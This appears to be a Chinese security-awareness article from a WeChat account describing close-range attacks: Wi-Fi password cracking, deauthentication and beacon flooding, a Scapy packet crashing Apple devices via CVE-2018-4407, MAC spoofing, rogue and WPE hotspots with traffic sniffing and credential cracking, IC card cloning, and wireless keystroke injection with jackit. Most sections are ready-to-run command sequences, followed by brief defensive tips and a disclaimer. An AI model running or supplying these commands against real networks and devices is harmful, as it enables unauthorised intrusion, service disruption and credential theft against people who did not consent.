此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
WI-FI破解
wifite
Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill
>airmon-ng start wlan1
安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本
>apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
>git clone https://github.com/ZerBea/hcxtools
>cd hcxtools
>make
>make install
>git clone https://github.com/ZerBea/hcxdumptool
>cd hcxdumptool
>make
>make install
>wifite –-dict /root/Desktop/wordlist.txt 加载
Aircrack-ng
>airmon-ng start wlan0 开启监听模式
>airodump-ng wlan0mon 查看数据包
>airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包
>aireplay-ng –deauth 10 –a APmac wlan0mon deauth攻击
>aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth攻击某个设备直至获取handshake(握手包)
>airmon-ng stop wlan0mon 关闭监听模式
>aircrack-ng –w wordlist.txt name.cap 指定字典破解密码
三沐提醒:
无线干扰
需切换网卡为监听模式
airmon-ng start wlan1
创建大量虚假热点Mdk3 mon0 b
mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500
针对AP
airmon-ng start wlan1
aireplay-ng –deauth 10 –a AP's mac address mon0
针对AP内设备
airmon-ng start wlan1 将网卡置为监听模式
airodump-ng wlan1mon –bssid 目标ap的ssid
aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon 开始攻击
针对范围内
mdk3 wlan1mon d
针对AP
airodump-ng wlan1mon
mdk3 wlan1mon a -a APmac 发起攻击
黑名单
mdk3 wlan1mon d –c 信道 –b /blacklist.txt.
mdk3 wlan1mon b -n test -w -g -c 1 -s 200
WiFi芯片esp8266
Mdk4
mdk4 wlan0mon d
CVE-2018-4407
Scapy
send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
绕过mac地址认证
Ifconfig
>ifconfig wlan1 down
>ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
>ifconfig wlan1 up
Macchanger
>macchanger –m xx:xx:xx:xx:xx:xx wlan1
>macchanger –r wlan1
钓鱼网络
Hostapd
apt install hostapd dnsmasq
cd /etc/hostapd
vim open.conf 创建无加密热点
Interface=wlan1
Ssid=FreeWIFI
Driver=nl80211
Channel=1
Hw_mode=g
>vim /etc/dnsmasq.conf
Dhcp-range=10.0.0.1, 10.0.0.255,12h
Interface=wlan1
>systemctl restart dnsmasq
消除网卡限制
nmcli radio wifi off
rfkill unblock wlan
ifconfig wlan1 10.0.0.1/24
hostapd open.conf
嗅探
sysctl –w net.ipv4.ip_forward=1
iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE
bettercap –iface wlan1
net.show
net.sniff on
driftnet –i wlan1
Hostapd-wpe
apt install hostapd-wpe
vim /etc/hostapd-wpe/hostapd-wpe.conf
配置interface=wlan1
Ssid=
Channel=
证书修改
cd /etc/hostapd-wpe/certs/
文件ca.cnf server.cnf client.cnf
修改countrName stateOrProvinceName localityName …….
rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
make clean
./bootstrap
make install
执行创建热点
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
获取到密码时使用asleep破解
asleap –C Challenge值 –R response值 –W 字典文件
三沐提醒:
BadUSB
特点:
支持设置冲突解决方案
支持选择性复制,包括扩展名黑白名单、磁盘黑白名单。磁盘黑白名单支持序列号
白名单模式结合版本控制可以方便地备份U盘
支持隐藏模式及开机启动
支持设置回调,可以自己编写代码实现某种高级的、程序没有提供的功能。
默认提供Git版本控制支持
支持限制文件大小,防止复制大文件造成延误
支持延迟复制,对“偷”课件类的场景提升用户体验十分有用
USB 设备和按键注入攻击的危险性OPSWAT
三沐提醒:
1.禁用自动运行功能:关闭USB接口的自动运行功能,防止病毒通过USB设备自动执行。该系统可以帮助管理员设置USB接口的安全策略,禁止自动运行功能,降低感染病毒的风险。
2.谨慎使用未知USB设备:在使用USB设备前,先进行安全检查和验证,确保设备来源可靠、无病毒。该系统可以集成设备认证功能,对连接的USB设备进行身份验证和授权管理,防止未经授权的USB设备接入系统。
3.加密存储数据:使用支持硬件加密的USB存储设备,确保数据在传输和存储过程中的安全性。该系统支持对文件进行透明加密,防止数据在USB设备上被非法访问或窃取。
4.监控USB使用行为:对USB设备的使用进行实时监控和记录,及时发现异常行为。该系统提供实时屏幕监控和上网行为管理功能,能够记录和分析USB设备的使用情况,发现潜在的安全风险。
5.设定USB访问权限:根据用户的职责和权限,设定不同的USB访问权限。该系统支持分部门部署加密方案,对不同部门或用户的USB访问权限进行精细化管理,确保重要数据只能在授权范围内使用。
6.定期审计和检查:定期对USB设备的使用情况进行审计和检查,确保安全策略得到有效执行。该系统提供数据监控和审计功能,能够记录和分析USB设备的使用情况,为管理员提供全面的安全审计支持。
克隆卡
(1)使用软件连接读卡器:
(2)dump出卡的内容:
(3)使用克隆软件将dump的内容拷贝至空卡中:
连接->写卡
(4)但是上面的工具有的时候只针对与特定的读卡器,反正我是没成功,用了下面这款才成功的:
点击读IC卡,然后操作与之前一致:
然后导出dump文件后,将dump文件写入另一张IC卡即可:
另一种方法是直接选择“写IC卡”:
三沐提醒:
逻辑安全方面,存储器分区保护区分公开、工作和保密区域,用户鉴别包括PIN验证、生物识别,如指纹识别。指纹识别技术利用指纹的唯一性,结合IC卡的特性,实现身份真实认证和数据保护,是信息安全的重要补充。
指纹IC卡技术在各种应用场景中广泛应用,如网络通信、数据库管理、电子商务和电子支付等,尤其在管理员身份认证、权限管理、密钥保护等关键环节中发挥重要作用。通过活体指纹验证和双重认证,增强了系统的可靠性和安全性。
蓝牙攻击
这里主要使用的工具为jackit,攻击机环境为kali
git clone https://github.com/insecurityofthings/jackit
cd jackit
pip2 install -e .
sudo jackit --script examples/test.txt
test.txt的内容为键盘执行的命令,在example目录下有很多案例,根据实际情况更改命令即可
运行截图
过几秒后就会看到嗅探到了很多设备(注意:距离目标1.5m内甚至更近才能嗅探到并攻击成功,距离太远会失败)
这时按control+c,会提示输入选择攻击的目标,一般这里直接输入all,表示对所有嗅探到的设备进行攻击
三沐提醒:
1、在不使用蓝牙时关闭它,以减少被黑客攻击的风险。
2、保持设备和操作系统更新至最新版本,确保蓝牙技术得到及时修复和安全漏洞的解决。
3、仅与可信设备进行蓝牙配对,确保其他设备也使用最新的蓝牙技术,以降低数据拦截的风险。
4、使用虚拟专用网络(VPN)加密数据,增强设备的安全性。选择一个提供强大加密协议和多个服务器位置的VPN,这不仅可以提高安全性,还能让人们访问受地理限制的内容,并实现匿名浏览互联网。
原文始发于微信公众号(三沐数安):揭秘常见的几种近源攻击的方式,提高防御意识。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论